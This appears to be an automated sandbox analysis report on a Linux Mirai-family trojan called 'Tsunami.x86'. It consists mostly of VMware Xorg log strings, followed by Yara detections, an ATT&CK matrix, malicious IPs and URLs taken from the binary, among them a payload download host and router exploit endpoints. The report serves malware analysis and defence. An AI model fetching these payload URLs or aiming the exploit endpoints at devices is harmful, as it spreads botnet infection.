    Source: Xorg.0.log.59.drBinary or memory string: [ 461.028] (II) vmware(0): Not using default mode "640x400" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 589.696] (II) vmware(0): Not using default mode "960x720" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.735] (II) vmware(0): Not using default mode "1024x768" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.343] (II) vmware(0): Not using default mode "1280x1024" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.850] (II) vmware(0): Not using default mode "1600x900" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.257] (II) vmware(0): Not using default mode "400x300" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.552] (II) vmware(0): Not using default mode "1360x768" (width requires unsupported line pitch)
    Source: Xorg.0.log.152.drBinary or memory string: [ 591.261] (II) vmware(0): Not using default mode "1024x576" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 594.291] (**) vmware(0): Default mode "640x480": 31.5 MHz, 37.9 kHz, 72.8 Hz
    Source: Xorg.0.log.152.drBinary or memory string: [ 589.617] (II) vmware(0): Not using default mode "928x696" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.895] (II) vmware(0): Not using default mode "2048x1152" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.268] (**) vmware(0): Default mode "800x600": 56.3 MHz, 53.7 kHz, 85.1 Hz
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.677] (II) vmware(0): Modeline "1152x864"x85.0 119.65 1152 1224 1352 1552 864 865 868 907 -hsync +vsync (77.1 kHz d)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.224] (II) vmware(0): Not using default mode "320x175" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.071] (II) vmware(0): Not using default mode "1600x1200" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.906] (II) vmware(0): Modeline "800x600"x85.1 56.30 800 832 896 1048 600 601 604 631 +hsync +vsync (53.7 kHz d)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.528] (II) vmware(0): Not using default mode "960x600" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.371] (II) vmware(0): Not using default mode "640x512" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.542] (II) vmware(0): Not using default mode "1360x768" (width requires unsupported line pitch)
    Source: Xorg.0.log.59.drBinary or memory string: [ 460.999] (II) vmware(0): Not using default mode "7680x4320" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.901] (II) vmware(0): Not using default mode "2048x1152" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.635] (II) vmware(0): Modeline "1152x864"x100.0 143.47 1152 1232 1360 1568 864 865 868 915 -hsync +vsync (91.5 kHz d)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.956] (II) vmware(0): Modeline "800x600"x72.2 50.00 800 856 976 1040 600 637 643 666 +hsync +vsync (48.1 kHz d)
    Source: Xorg.0.log.152.drBinary or memory string: [ 604.086] (**) VirtualPS/2 VMware VMMouse: Applying InputClass "libinput pointer catchall"
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.064] (II) vmware(0): Not using default mode "1440x810" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.351] (II) vmware(0): Not using default mode "1280x1024" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 546.535] (--) vmware(0): bpp: 32
    Source: Xorg.0.log.152.drBinary or memory string: [ 589.200] (II) vmware(0): Not using default mode "1600x1200" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.755] (II) vmware(0): Not using default mode "320x180" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.698] (II) vmware(0): Not using default mode "960x600" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.454] (II) vmware(0): Not using default mode "1680x1050" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.294] (II) vmware(0): Not using default mode "2560x1440" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.685] (**) vmware(0): Default mode "1152x864": 108.0 MHz, 67.5 kHz, 75.0 Hz
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.431] (II) vmware(0): Not using default mode "1440x900" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.649] (II) vmware(0): Not using default mode "840x525" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 544.414] (WW) vmware(0): Disabling Render Acceleration.
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.230] (II) vmware(0): Not using default mode "928x696" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.503] (II) vmware(0): Not using default mode "576x432" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 593.042] (**) vmware(0): Default mode "800x600": 36.0 MHz, 35.2 kHz, 56.2 Hz
    Source: Xorg.0.log.103.drBinary or memory string: [ 556.617] (II) event2 - VirtualPS/2 VMware VMMouse: is tagged by udev as: Mouse
    Source: Xorg.0.log.103.drBinary or memory string: [ 544.453] (--) vmware(0): VMware SVGA regs at (0x1070, 0x1071)
    Source: Xorg.0.log.103.drBinary or memory string: [ 549.254] (**) vmware(0): Default mode "1152x864": 96.8 MHz, 63.0 kHz, 70.0 Hz
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.860] (II) vmware(0): Not using default mode "1600x900" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.774] (==) vmware(0): Silken mouse enabled
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.076] (II) vmware(0): Not using default mode "1920x1200" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.067] (II) vmware(0): Not using default mode "1680x1050" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.551] (II) vmware(0): Not using default mode "1680x1050" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.589] (II) vmware(0): Not using default mode "1920x1440" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.099] (II) vmware(0): Not using default mode "2560x1600" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 549.056] (II) vmware(0): Not using default mode "2560x1600" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 591.196] (II) vmware(0): Not using default mode "960x540" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.492] (II) vmware(0): Not using default mode "1680x1050" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.771] (II) vmware(0): Not using default mode "1024x768" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.271] (II) vmware(0): Not using default mode "700x525" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 460.222] (II) vmware(0): Not using default mode "1280x720" (width requires unsupported line pitch)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.456] (II) vmware(0): Not using default mode "1856x1392" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.171] (--) vmware(0): w.blu: 8
    Source: Xorg.0.log.152.drBinary or memory string: [ 591.104] (II) vmware(0): Not using default mode "1280x720" (width requires unsupported line pitch)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.598] (II) vmware(0): Not using default mode "700x525" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 594.337] (II) vmware(0): Modeline "640x480"x59.9 25.18 640 656 752 800 480 490 492 525 -hsync -vsync (31.5 kHz d)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.574] (II) vmware(0): Not using default mode "960x540" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.843] (==) vmware(0): Backing store enabled
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.610] (II) vmware(0): Initialized VMWARE_CTRL extension version 0.2
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.607] (II) vmware(0): Not using default mode "2048x1536" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 546.507] (--) vmware(0): mheig: 885
    Source: Xorg.0.log.152.drBinary or memory string: [ 583.097] (II) LoadModule: "vmware"
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.626] (II) vmware(0): Not using default mode "960x540" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 542.772] (II) Loading /usr/lib/xorg/modules/drivers/vmware_drv.so
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.526] (II) vmware(0): Not using default mode "576x432" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.236] (II) vmware(0): Modeline "640x480"x85.0 36.00 640 696 752 832 480 481 484 509 -hsync -vsync (43.3 kHz d)
    Source: Xorg.0.log.59.drBinary or memory string: [ 460.912] (II) vmware(0): Not using default mode "1600x900" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.876] (II) vmware(0): Not using default mode "800x450" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 467.769] (**) VirtualPS/2 VMware VMMouse: (accel) selected scheme none/0
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.965] (II) vmware(0): Not using default mode "1280x800" (width requires unsupported line pitch)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.762] (**) vmware(0): Default mode "1024x768": 94.5 MHz, 68.7 kHz, 85.0 Hz
    Source: Xorg.0.log.59.drBinary or memory string: [ 460.946] (II) vmware(0): Not using default mode "4096x2304" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 591.177] (II) vmware(0): Not using default mode "1920x1080" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 546.463] (--) vmware(0): bpp: 32
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.871] (II) vmware(0): Not using default mode "1600x900" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.795] (II) vmware(0): Not using default mode "480x270" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.139] (**) vmware(0): Default mode "1024x576": 46.5 MHz, 35.9 kHz, 59.9 Hz
    Source: Xorg.0.log.103.drBinary or memory string: [ 556.544] (II) config/udev: Adding input device VirtualPS/2 VMware VMMouse (/dev/input/mouse1)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.248] (II) vmware(0): Not using default mode "960x720" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 467.610] (**) VirtualPS/2 VMware VMMouse: Applying InputClass "libinput pointer catchall"
    Source: Xorg.0.log.152.drBinary or memory string: [ 591.683] (II) vmware(0): Not using default mode "1280x720" (width requires unsupported line pitch)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.303] (II) vmware(0): Not using default mode "512x384" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.821] (II) vmware(0): Not using default mode "2880x1620" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.252] (**) vmware(0): Default mode "640x480": 25.2 MHz, 31.5 kHz, 59.9 Hz
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.177] (--) vmware(0): vis: 4
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.215] (II) vmware(0): Not using default mode "928x696" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.297] (**) vmware(0): Default mode "640x360": 17.8 MHz, 22.2 kHz, 59.3 Hz
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.622] (II) vmware(0): Initialized VMware Xinerama extension.
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.594] (II) vmware(0): Not using default mode "960x720" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.799] (II) vmware(0): Not using default mode "480x270" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 589.445] (II) vmware(0): Not using default mode "1792x1344" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 467.776] (**) VirtualPS/2 VMware VMMouse: (accel) acceleration factor: 2.000
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.270] (**) vmware(0): Default mode "720x400": 35.5 MHz, 37.9 kHz, 85.0 Hz
    Source: Xorg.0.log.59.drBinary or memory string: [ 467.696] (II) event2 - VirtualPS/2 VMware VMMouse: is tagged by udev as: Mouse
    Source: Xorg.0.log.152.drBinary or memory string: [ 588.735] (==) vmware(0): Using HW cursor
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.780] (II) vmware(0): Initialized VMware Xv extension successfully.
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.730] (II) vmware(0): Not using default mode "2048x1536" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.148] (--) vmware(0): depth: 24
    Source: Xorg.0.log.152.drBinary or memory string: [ 605.055] (II) event2 - VirtualPS/2 VMware VMMouse: device removed
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.285] (II) vmware(0): Not using default mode "1400x1050" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 544.397] (WW) vmware(0): Disabling 3D support.
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.584] (II) vmware(0): Not using default mode "1280x800" (width requires unsupported line pitch)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.741] (II) vmware(0): Not using default mode "800x450" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.626] (II) vmware(0): vgaHWGetIOBase: hwp->IOBase is 0x03d0
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.924] (II) vmware(0): Not using default mode "7680x4320" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.425] (II) vmware(0): Not using default mode "700x525" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.276] (**) vmware(0): Default mode "800x600": 49.5 MHz, 46.9 kHz, 75.0 Hz
    Source: Xorg.0.log.152.drBinary or memory string: [ 604.278] (II) event2 - VirtualPS/2 VMware VMMouse: is tagged by udev as: Mouse
    Source: Xorg.0.log.59.drBinary or memory string: [ 457.466] (II) vmware: driver for VMware SVGA: vmware0405, vmware0710
    Source: Xorg.0.log.152.drBinary or memory string: [ 586.553] (--) vmware(0): VMware SVGA regs at (0x1070, 0x1071)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.567] (II) vmware(0): Not using default mode "700x525" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 460.988] (II) vmware(0): Not using default mode "3840x2160" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.773] (II) vmware(0): Not using default mode "864x486" (monitor doesn't support reduced blanking)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.239] (**) vmware(0): Default mode "640x480": 31.5 MHz, 37.5 kHz, 75.0 Hz
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.088] (II) vmware(0): Not using default mode "960x600" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 542.752] (II) LoadModule: "vmware"
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.133] (II) vmware(0): Modeline "1024x768"x60.0 65.00 1024 1048 1184 1344 768 771 777 806 -hsync -vsync (48.4 kHz d)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.571] (II) vmware(0): Not using default mode "1400x1050" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.670] (**) vmware(0): Default mode "1152x864": 119.7 MHz, 77.1 kHz, 85.0 Hz
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.860] (II) vmware(0): Not using default mode "1920x1080" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.684] (II) vmware(0): Not using default mode "480x270" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 546.973] (II) vmware(0): Not using default mode "512x384" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.684] (II) vmware(0): Not using default mode "1920x1080" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.845] (II) vmware(0): Not using default mode "3200x1800" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 604.427] (II) event2 - VirtualPS/2 VMware VMMouse: is tagged by udev as: Mouse
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.201] (**) vmware(0): Default mode "800x600": 40.0 MHz, 37.9 kHz, 60.3 Hz
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.804] (II) vmware(0): Not using default mode "2560x1440" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.922] (II) vmware(0): Modeline "800x600"x75.0 49.50 800 816 896 1056 600 601 604 625 +hsync +vsync (46.9 kHz d)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.199] (**) vmware(0): Default mode "1024x768": 94.5 MHz, 68.7 kHz, 85.0 Hz
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.245] (II) vmware(0): Modeline "1024x576"x59.9 46.50 1024 1064 1160 1296 576 579 584 599 -hsync +vsync (35.9 kHz d)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.391] (**) vmware(0): Default mode "640x360": 18.0 MHz, 22.5 kHz, 59.8 Hz
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.753] (II) vmware(0): Modeline "1152x864"x60.0 81.62 1152 1216 1336 1520 864 865 868 895 -hsync +vsync (53.7 kHz d)
    Source: Xorg.0.log.152.drBinary or memory string: [ 597.138] (==) vmware(0): Backing store enabled
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.664] (II) vmware(0): Not using default mode "1680x1050" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 549.060] (II) vmware(0): Not using default mode "1280x800" (width requires unsupported line pitch)
    Source: Xorg.0.log.103.drBinary or memory string: [ 546.806] (II) vmware(0): Not using default mode "400x300" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.680] (II) vmware(0): Not using default mode "480x270" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.366] (**) vmware(0): Default mode "720x405": 22.5 MHz, 25.1 kHz, 59.5 Hz
    Source: Xorg.0.log.152.drBinary or memory string: [ 588.704] (==) vmware(0): RGB weight 888

    Language, Device and Operating System Detection:

    Reads system files that contain records of logged in users
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 5709) Logged in records file read: /var/log/wtmp
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 6242) Logged in records file read: /var/log/wtmp
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 6700) Logged in records file read: /var/log/wtmp
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 7118) Logged in records file read: /var/log/wtmp

    Stealing of Sensitive Information:

    Yara detected Mirai
    Source: Yara match File source: 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmp, type: MEMORY
    Source: Yara match File source: 5246.1.000000001a887bdc.00000000934a2024.r-x.sdmp, type: MEMORY

    Remote Access Functionality:

    Yara detected Mirai
    Source: Yara match File source: 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmp, type: MEMORY
    Source: Yara match File source: 5246.1.000000001a887bdc.00000000934a2024.r-x.sdmp, type: MEMORY

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Scripting 1 | Systemd Service 1 | Systemd Service 1 | File and Directory Permissions Modification 1 | OS Credential Dumping 1 | Security Software Discovery 11 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Scripting 1 | LSASS Memory | System Owner/User Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Standard Port 11 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Hidden Files and Directories 1 | Security Account Manager | File and Directory Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 1 | NTDS | System Information Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol 3 | SIM Card Swap | | Carrier Billing Fraud
    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Indicator Removal on Host 1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 4 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
    Replication Through Removable Media | Launchd | Rc.common | Rc.common | File Deletion 1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

    Malware Configuration

    No configs have been found

    Behavior Graph

    [Behavior graph: ID 512552, sample Tsunami.x86, start date 01/11/2021, architecture LINUX, score 88]

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label
    Tsunami.x86 | 33% | Virustotal |
    Tsunami.x86 | 33% | ReversingLabs | Linux.Trojan.Mirai

    Dropped Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    Source | Detection | Scanner | Label
    http://127.0.0.1:80/tmUnblock.cgi | 0% | Virustotal |
    http://127.0.0.1:80/tmUnblock.cgi | 0% | Avira URL Cloud | safe
    http://23.94.37.59/bin | 0% | Avira URL Cloud | safe
    http://23.94.37.59/bins/Tsunami.mips; | 0% | Avira URL Cloud | safe
    http://23.94.37.59/bins/Tsunami.x86 | 12% | Virustotal |
    http://23.94.37.59/bins/Tsunami.x86 | 0% | Avira URL Cloud | safe
    http://23.94.37.59/zyxel.sh; | 0% | Avira URL Cloud | safe
    http://192.168.0.14:80/cgi-bin/ViewLog.asp | 0% | Avira URL Cloud | safe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    Name | Malicious | Antivirus Detection | Reputation
    http://127.0.0.1:80/tmUnblock.cgi | true | 0%, Virustotal; Avira URL Cloud: safe | unknown
    http://192.168.0.14:80/cgi-bin/ViewLog.asp | false | Avira URL Cloud: safe | unknown

    URLs from Memory and Binaries

    Name | Source | Malicious | Antivirus Detection | Reputation
    http://schemas.xmlsoap.org/soap/encoding//%22%3E | Tsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmp | false | | high
    http://schemas.xmlsoap.org/soap/encoding/ | Tsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmp | false | | high
    http://wiki.x.org | Xorg.0.log.103.dr, Xorg.0.log.59.dr, Xorg.0.log.152.dr | false | | high
    http://schemas.xmlsoap.org/soap/envelope/ | Tsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmp | false | | high
    http://23.94.37.59/bin | Tsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmp | false | Avira URL Cloud: safe | unknown
    http://upx.sf.net | Tsunami.x86 | false | | high
    http://23.94.37.59/bins/Tsunami.mips; | Tsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmp | false | Avira URL Cloud: safe | unknown
    http://23.94.37.59/bins/Tsunami.x86 | Tsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmp | true | 12%, Virustotal; Avira URL Cloud: safe | unknown
    http://schemas.xmlsoap.org/soap/envelope// | Tsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmp | false | | high
    http://www.ubuntu.com/support) | Xorg.0.log.103.dr, Xorg.0.log.59.dr, Xorg.0.log.152.dr | false | | high
    http://23.94.37.59/zyxel.sh; | Tsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmp | false | Avira URL Cloud: safe | unknown

    Contacted IPs

    Public

    Runtime Messages

    Command: /tmp/Tsunami.x86
    Exit Code: 0
    Exit Code Info:
    Killed: False
    Standard Output:
    kebabware installed
    Standard Error:

    Joe Sandbox View / Context

    IPs

    Match | Associated Sample Name / URL | Detection
    95.94.164.44 | dcMqJ2tQNW | malicious
    85.128.224.43 | 32UX3eB2m0 | malicious
    31.220.220.232 | 8FumSfvXxc | malicious
    94.154.174.107 | dqnskKAmQq | malicious
    184.195.61.175 | I02N89IxJv | malicious

    Domains

    No context

    ASN

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            /home/saturnino/.config/pulse/ee49dfd4fa47433baee88884e2d7de7c-default-sink
                            Process:/usr/bin/pulseaudio
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):10
                            Entropy (8bit):2.9219280948873623
                            Encrypted:false
                            SSDEEP:3:5bkPn:pkP
                            MD5:FF001A15CE15CF062A3704CEA2991B5F
                            SHA1:B06F6855F376C3245B82212AC73ADED55DFE5DEF
                            SHA-256:C54830B41ECFA1B6FBDC30397188DDA86B7B200E62AEAC21AE694A6192DCC38A
                            SHA-512:65EBF7C31F6F65713CE01B38A112E97D0AE64A6BD1DA40CE4C1B998F10CD3912EE1A48BB2B279B24493062118AAB3B8753742E2AF28E56A31A7AAB27DE80E7BF
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview: auto_null.
                            /home/saturnino/.config/pulse/ee49dfd4fa47433baee88884e2d7de7c-default-source
                            Process:/usr/bin/pulseaudio
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):18
                            Entropy (8bit):3.4613201402110088
                            Encrypted:false
                            SSDEEP:3:5bkrIZsXvn:pkckv
                            MD5:28FE6435F34B3367707BB1C5D5F6B430
                            SHA1:EB8FE2D16BD6BBCCE106C94E4D284543B2573CF6
                            SHA-256:721A37C69E555799B41D308849E8F8125441883AB021B723FED90A9B744F36C0
                            SHA-512:6B6AB7C0979629D0FEF6BE47C5C6BCC367EDD0AAE3FC973F4DE2FD5F0A819C89E7656DB65D453B1B5398E54012B27EDFE02894AD87A7E0AF3A9C5F2EB24A9919
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview: auto_null.monitor.
                            /memfd:30-systemd-environment-d-generator (deleted)
                            Process:/usr/lib/systemd/user-environment-generators/30-systemd-environment-d-generator
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):200
                            Entropy (8bit):4.621490641385995
                            Encrypted:false
                            SSDEEP:3:+2snsY7+4VMPQnMLmPQ9JEcn8YLw6mNErZwb906izhs32Y0f/KiDXK/vi++BLiVv:Ess+4m4Mixc8Y06me6osMjDXj++yvn
                            MD5:5EF9649F7C218F464C253BDC1549C046
                            SHA1:07C3B1103F09E5FB0B4701E75E326D55D4FC570B
                            SHA-256:B4480A805024063034CB27A4A70BCA625C46C98963A39FE18F9BE2C499F1DA40
                            SHA-512:DF620669CD92538F00FEB397BA8BB0C0DC9E242BA2A3F25561DE20AE59B73AC54A15DBFBD4C43F8006FA09D0A07D9EC5DD5D395AD4746E022A17E78274DEB83B
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview: QT_ACCESSIBILITY=1.PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/snap/bin.XDG_DATA_DIRS=/usr/local/share/:/usr/share/:/var/lib/snapd/desktop.
                            /memfd:user-environment-generators (deleted)
                            Process:/lib/systemd/systemd
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):212
                            Entropy (8bit):4.657790370557215
                            Encrypted:false
                            SSDEEP:6:ulsT4m4Mixc8Y06me6kLT0QsMjDXj++yvn:XT5ikXT05OLj+Hvn
                            MD5:769AC00395ABDA061DA4777C87620B21
                            SHA1:AC12A8E0EB413395C64577FA7E514626B8F8F548
                            SHA-256:75867CD2977A9A9AAB70E70CFEE3C20151F31C9B3CBDA4A81C06627C291D2C82
                            SHA-512:67C2B17CDD15B7F69BE2DF4F3136E3F393C1C6F990755DFEEC1B0B4E1081A15132A8D77A1624CAD1F6255591AE54CB9135F1B94FE31D5876E2A17B215CDB78F3
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview: env=QT_ACCESSIBILITY=1.env=PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/snap/bin.env=XDG_DATA_DIRS=/usr/local/share/:/usr/share/:/var/lib/snapd/desktop.
                            /proc/5272/oom_score_adj
